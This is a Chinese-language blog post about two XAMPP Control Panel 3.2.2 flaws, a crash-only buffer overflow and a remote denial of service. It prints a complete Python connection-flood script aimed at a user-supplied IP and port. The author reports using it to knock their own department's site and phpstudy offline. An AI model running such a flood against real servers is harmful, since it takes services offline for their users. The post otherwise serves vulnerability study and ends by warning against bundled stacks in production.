1. 程式人生 > >xampp拒絕服務漏洞

xampp拒絕服務漏洞

默認 網站 die inf NPU 一個 配置 遠程 clas

  最近在看通用漏洞,發現我們部門網站使用了xampp3.2.2做網站部署,於是在網上搜索xampp,還真找到兩個漏洞。

  一個是今年9月出的一個XAMPP Control Panel 3.2.2 Buffer Overflow;另一個是幾年前的一個遠程拒絕服務,發現竟然還能用(?_?)。

#0x01 XAMPP Control Panel 3.2.2 Buffer Overflow

  網上共找到兩種Poc:

  http://www.vfocus.net/art/20181220/15036.html

  http://www.vfocus.net/art/20180917/14798.html

  下載運行腳本,會生成一個exploit.txt文件。

  在Control Panel裏點擊右上角的config,將exlpoit裏的內容復制到editor和browser裏,保存。

技術分享圖片

然後點擊查看httpd.conf文件,會彈出崩潰。

技術分享圖片

崩潰後web進程並沒有中斷,並沒有達成拒絕服務,只是程序崩潰而已,貌似價值不高。

#0x02XAMPP Control Panel - Denial Of Service

  找到一個poc:

  https://www.anquanke.com/vul/id/1067740

  大體意思就是在xampp監聽的這些端口:

(MySQL) 3306 v3.2.2
(Tomcat) 8080 (XAMPP v3.1.0)
(FileZilla) 21
(Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.

  如果發送大量的垃圾數據,就會造成內存崩潰和拒絕服務。

POC:

import socket

print "XAMPP Control Panel DOS"
print "Discovery: John Page (hyp3rlinx)"
print "ApparitionSec"
print "hyp3rlinx.altervista.org\r\n"

IP = raw_input("[IP]> ")
PORT = raw_input("[PORT]> ")

arr=[]
c=0
while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send("DOOM")
        print "Die!"
        c+=1
    except socket.error:
        print "[+] Done! "
        raw_input()
        break

對xampp的80端口嘗試攻擊:

技術分享圖片

效果顯著。中斷腳本後,網站即可恢復。

想到其他建站工具也可能有這種問題,又拿腳本測了下phpstudy,同樣可以實現拒絕服務。

#0x03

  怪不得都說網站正式部署最好不要用這些集成工具包,一個是很容易由於默認配置遭到入侵,還有這種dos攻擊。

xampp拒絕服務漏洞